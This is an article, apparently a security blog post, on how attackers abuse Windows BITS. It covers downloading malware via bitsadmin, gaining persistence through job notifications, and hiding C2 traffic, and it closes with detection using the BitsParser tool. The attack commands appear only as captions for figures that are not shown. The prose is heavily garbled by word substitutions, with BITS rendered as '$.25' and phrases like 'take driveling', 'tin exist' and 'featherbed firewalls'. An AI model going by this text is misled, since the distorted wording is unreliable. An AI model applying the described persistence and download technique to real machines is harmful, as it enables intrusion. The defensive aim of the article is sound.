What Is The Background Intelligent Transfer Service

In the last few months, cybercrime gangs take driveling the Windows Groundwork Intelligent Transfer Service (Bits) in malware every bit a way of masquerading their operations.

In this article, we are going to learn virtually BITS, Malware is using the BITS characteristic for nefarious reasons, but in that location are ways to forestall and observe scenarios of this nature.

What is Windows Background Intelligent Transfer Service?

Bits is a service available on Windows operating system and the default mode through which Microsoft sends Windows updates to users all over the earth. Applications and system components, including Windows Update, use BITS to deliver operating system and awarding updates and then they tin be downloaded with minimal disruption.

Figure 1: $.25 service and its configuration (automated mode).

BITS works based on jobs with one or more files to download and upload depending on the number of applications it interacts with. The BITS service runs in a service host procedure and it can schedule transfers such as the well-known Windows Updates. Information on the jobs, files and states is stored in a local database (BITS QMGR).

How criminals are using $.25

The massive usage of Bits in the wild by criminal groups is not new. For example, a backdoor used by the infamous Stealth Falcon group takes advantage of this service to communicate with the C2 server.

ESET research squad said the Win32/StealthFalcon backdoor didn't communicate with its remote server via classic HTTP or HTTPS requests but hid C&C traffic inside BITS.

Bits was designed to work together with Windows applications and download and upload data in a stealthy way. Because of this, this resource tin exist useful to evade firewalls that may block malicious or unknown processes — and, of grade, it helps to masquerade which applications are requesting or downloading data from the internet.

One of the nearly powerful features is that BITS transfers are asynchronous and the application that created a job may not be running when the requested transfers complete. In this sense, criminals accept used this feature every bit a method for creating the persistence of malicious applications for a long time.

Another key point from the criminal's bespeak of view is how data is kept. In one case control data is stored in a database instead of traditional registry locations, many tools and forensic analysts may non pay attending and identify malicious persistence via BITS early.

Downloading the malicious binary

$.25 commands can be hardcoded inside malwares' codes, PowerShell loaders, and and so on. The jobs can be created by using API function calls or via the bitsadmin control-line tool. Effigy 2 shows how a malicious file named "malware.exe" could exist retrieved from an HTTPS C2 server and stored in the C:\windows binder.

Figure 2: Using bitsadmin to create a job that downloads a malicious executable and stores it to c:\windows\malware.exe.

Figure iii: Malicious file downloaded into the C:\windows folder.

Creating persistence

A method of creating persistence on the target machine is accomplished by setting a notify every bit presented in Figure four below.

Effigy 4: Creating persistence on the target car via $.25.

With this method in place, several groups created persistence, evaded firewalls and detection just using BITS. For example, many incidents involving Ryuk ransomware operators leveraging custom backdoors and loaders to actively target hospitals and other medical support centers in the by.

Tackling security problems with BITS

Bits is a strong service and many times used by criminals to featherbed firewalls equally organizations tend to ignore BITS traffic knowing it contains software updates, and because it just racket on the network traffic.

Ane of the advantages of using BITS is the ability to pause any malicious traffic if the user is using its machine, operating simply in reanimation periods. With this in listen, we easily learned that the alter of human detection is minimal, although the malware can nonetheless be detected by proper security solutions when it modifies local registries and other BITS settings or scheduled tasks.

Fireeye worked in this way and released a tool called BitsParser. In short, the tool parses BITS databases and returns information about jobs executed on endpoint systems. Later that, the analyst should look through the results and identify any malicious artifact or even if an abnormal schedule exists.

Effigy 5: GitHub folio of BitsParser and tool usage.

The results obtained after running the tool are obvious and follows the format beneath:

Figure 6: Report generated after running BitsParser tool.

$.25 continues to be explored and used by criminals in their malicious activities. For this reason, the BITS QMGR database provides a useful source of data for consideration during your hunting operations.